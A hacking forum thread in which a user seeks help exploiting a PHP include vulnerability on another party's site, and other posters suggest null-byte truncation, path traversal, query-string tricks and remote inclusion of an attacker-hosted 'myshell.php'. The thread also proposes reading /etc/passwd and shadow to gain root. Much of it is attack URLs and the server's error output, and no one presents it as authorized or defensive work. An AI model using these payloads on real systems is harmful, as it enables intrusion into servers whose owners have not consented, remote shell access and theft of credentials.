Exploit?

I found function include some page.

The page looks like:

http://www.site.com/news/news.php?id=abcd

It generates error:

Warning: main() [function.include]: Failed opening 'newsabcd.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php')

The source probably looks like:

include 'news' . $GET['id'] . '.php'

So, I can't include my php file.

I tried googling for some help about htaccess that removes the php handeler, but I didn't get any help.

Can you give me some help in that?

Don't do google links. If you wanna help me, help me ;)

have you tried null byte? %00 on either the end or the beginning of the GET variable

I tried

http://www.site.com/news/news.php?id=%00abcd

http://www.site.com/news/news.php?id=abcd%00

And I get similar error

try: ../pageyouwannainclude.ext%00

The ../ should get rid of "news", and the %00 will get rid of the default extension.

when you use the %00 (poison null byte) does it change it to like \0 or \00? If so then that is because their server is filtering it, but you can also try like

page.php?file=abcd?getridofphpextension=

this will put what ever is being appended onto the include statement, into a get variable

system_meltdown wrote: try: ../pageyouwannainclude.ext%00

The ../ should get rid of "news", and the %00 will get rid of the default extension.

Warning: main() [function.include]: Failed opening 'news../http://www.mysite.com/myfile.php\0.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in

That is the error I get. I tried without 'http://' but I still get error.

chislam:

http://www.site.com/news/news.php?id=%00

Warning: main() [function.include]: Failed opening 'news\0.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in

I think system was referring to local file inclusions

Indeed I was lol

So, do you have any Remote file inclusion idea?

ok so that means that its filtering pnb's so try the method that i gave you lol

Err, chislam, yours doesn't get rid of the stuff which it tacks onto the beginning of the string

http://www.site.com/news/news.php?id=http://www.mysite.com/myshell.php?blablaextension=

I get rid of .php extension. But I still have that 'news' part on the begining

Warning: main() [function.include]: Failed opening 'newshttp://www.mysite.com/myshell.php?blablaextension=.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in

[]EDIT: That's right mozzer

Try sticking a backslash at the start

I though of that cause

markupnews\http://google.com

Works on firefox

ah ok my bad, i didn't realize that it was putting things before it. my bad :(

anyways, if just putting http://yourshell.php?asdf=url doesn't work try putting ../http://yourshell.php?asdf=

or just grab a local file like system was referring to.

Why would adding ../ help?

All that does is goes up a directory in their filesystem

I don't know, but its worth a shot. Might not work, and probably won't but if it did, you wouldn't know.

http://www.site.com/news/news.php?id=\http://www.mysite.com/myshell.php?ext=

Warning: main() [function.include]: Failed opening 'news\\http://www.mysite.com/myshell.php?blablaextension=.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php' in

and ../ also doesn't work :(

wow my little reply sparked off all this :D

have you tried grabbing etc/passwd or shadow?

you might get lucky and be able to root it…

Firstly, all of your adding query strings do not work on the file system, therefore you need something else to end the files

Secondly, until you can find a protocol which begins with news, perhaps RSS? Then you wont be able to hack this, sorry,

lukem_95 wrote: wow my little reply sparked off all this :D

have you tried grabbing etc/passwd or shadow?

you might get lucky and be able to root it…

I can't go up in directory. I can't move from '/news/'

EDIT:

I made subdomain on one site. news.mysite.com

I don' really need to get rid of php extension because my file is php.

I try http://www.site.com/news/news.php?id=.mysite.com/myfile

and I get error:

Warning: main() [function.include]: Failed opening 'news.mysite.com/myfile.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in

Damn. I guess I need http:// in the begining :(